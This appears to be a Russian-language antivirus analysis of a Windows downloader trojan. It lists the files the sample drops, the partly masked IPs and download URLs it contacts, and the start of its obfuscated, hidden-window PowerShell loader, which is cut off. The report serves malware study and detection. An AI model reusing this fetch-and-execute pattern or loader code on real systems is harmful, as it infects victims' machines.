Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\camp.exe
- %APPDATA%\system.exe
Сетевая активность
Подключается к
- '19#.#6.146.131':80
- '80.#6.87.52':2500
TCP
Запросы HTTP GET
- http://19#.#6.146.131/crypt/bart/camp.exe
- http://19#.#6.146.131/crypt/bart/system.exe
- http://19#.#6.146.131/bartonewlnk.exe
Другое
Создает и запускает на исполнение
- '%APPDATA%\camp.exe'
- '%APPDATA%\system.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted function PBSUJ($kVLkwh, $KuqoVNxURZdcXze){[IO.File]::WriteAllBytes($kVLkwh, $KuqoVNxURZdcXze)};function qQBHwkdspw($kVLkwh){if($kVLkwh.EndsWith((yEtgZvebzOZ @(7905...' (со скрытым окном)
